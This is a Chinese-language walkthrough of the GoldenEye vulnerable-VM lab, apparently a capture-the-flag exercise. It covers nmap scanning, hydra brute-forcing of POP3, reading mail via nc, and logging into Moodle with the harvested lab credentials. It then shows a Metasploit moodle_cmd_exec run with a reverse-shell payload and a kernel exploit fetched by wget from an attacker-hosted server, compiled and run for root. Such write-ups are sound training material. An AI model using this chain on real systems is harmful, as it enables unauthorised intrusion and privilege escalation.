扫描挖掘本地的IP地址信息:
nmap -sT 192.168.111.101
发现开放了25,80端口
提示可以访问/sev-home/ ,访问后让我们输入账号密码,查看页面原代码 访问/terminal.js
提示账号Boris,Natalya和密码,将密码进行解码,登录/sev-home/
得到提示:is very effective, we have configured our pop3 service to run on a very high non-default port
使用nmap探测端口
nmap -p- 192.168.111.101 -T4
nmap -sS -sV -T4 -A -p55006,55007 192.168.111.101
这段信息看出这两个端口开放了pop3的mail服务的,通过/terminal.js页面,在注释中发现一条内容,指出目标系统正在使用默认密码。
我们已知账号,通过hydra爆破,账号为Boris,Natalya,写在uname.txt文件夹
hydra -L uname.txt -P /usr/share/wordlists/fasttrack.txt -s 192.168.111.101:55007 pop3
用户:boris 密码:secret1!
用户:natalya 密码:bird
通过NC登录pop3查看邮件信封内容枚举:
查看前三个邮件
第二封来自用户"natalya",称她可以破坏鲍里斯的密码。
第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。
继续登录natalva账号查看邮件
两封邮件:第一封邮件:
娜塔莉亚,请你停止破解鲍里斯的密码。 此外,您是 GNO 培训主管。 一旦学生被指定给你,我就会给你发电子邮件。
此外,请注意可能的网络漏洞。 我们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye。
第二封邮件:
好的 Natalyn 我有一个新学生给你。 由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题......即使不是,也只需以"安全"为幌子输入......它就会 轻松升级变更单:)
好的,用户信用是:
用户名:xenia
密码:RCP90rulez!
鲍里斯验证了她是一个有效的承包商,所以只需创建帐户好吗?
如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程离线工作....
由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。
我们来设置本地hosts文件
nano /etc/hosts
进行修改
访问severnaya-station.com/gnocertdir地址:
点击:Intro to GoldenEye可以进行登录,使用natalya邮箱第二封邮件获得的用户名密码登录:
登录成功!
Home / ▶ My profile / ▶ Messages --->发现有一封邮件,内容发现用户名doak
爆破用户名doak的邮件
hydra -L uname.txt -P /usr/share/wordlists/fasttrack.txt 192.168.111.101 -s 55007 pop3
得到密码,继续使用nc登录pop3,访问邮件,得到信息:
邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
使用新账号登录cms:
登录成功,在:Home / ▶ My home 右边发现: s3cret.txt 另外发现这是Moodle使用的2.2.3版本
访问severnaya-station.com/dir007key/for-007.jpg
下载到本地:
wget http://severnaya-station.com/dir007key/for-007.jpg
根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:
binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令)
等查看jpg文件底层内容!
base64解码
线索中说,这是管理员的密码,通过admin账号登录cms
登录成功,可以搜索此版本的漏洞,我使用rce进行利用
使用msf
msfconsole ---进入MSF框架攻击界面
search moodle ---查找 moodle类型 攻击的模块
use 1 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本
set username admin ---设置用户名:admin
set password xWinter1995x! ---设置密码:xWinter1995x!
set rhost severnaya-station.com ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir ---设置目录: /gnocertdir
set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse
set lhost 192.168.4.231 ---设置:lhost 192.168.4.231(需要本地IP)
exploit ----执行命令
成功拿下shell
进行内核提权:
uname -a
searchsploit 3.13
cp /usr/share/exploitdb/exploits/linux/local/37292.c 1.c
无法进行GCC编译,需要改下脚本为cc
gedit 1.c / nano 1.c ---文本打开
第143行将gcc改为cc ---编写下
然后在本目录下开启服务器:
python -m http.server 8081
反弹shell中执行wget http://192.168.111.25/1.c
cc 1.c shell
chmod 777 shell
./shell
whoami
cd /root
打完收工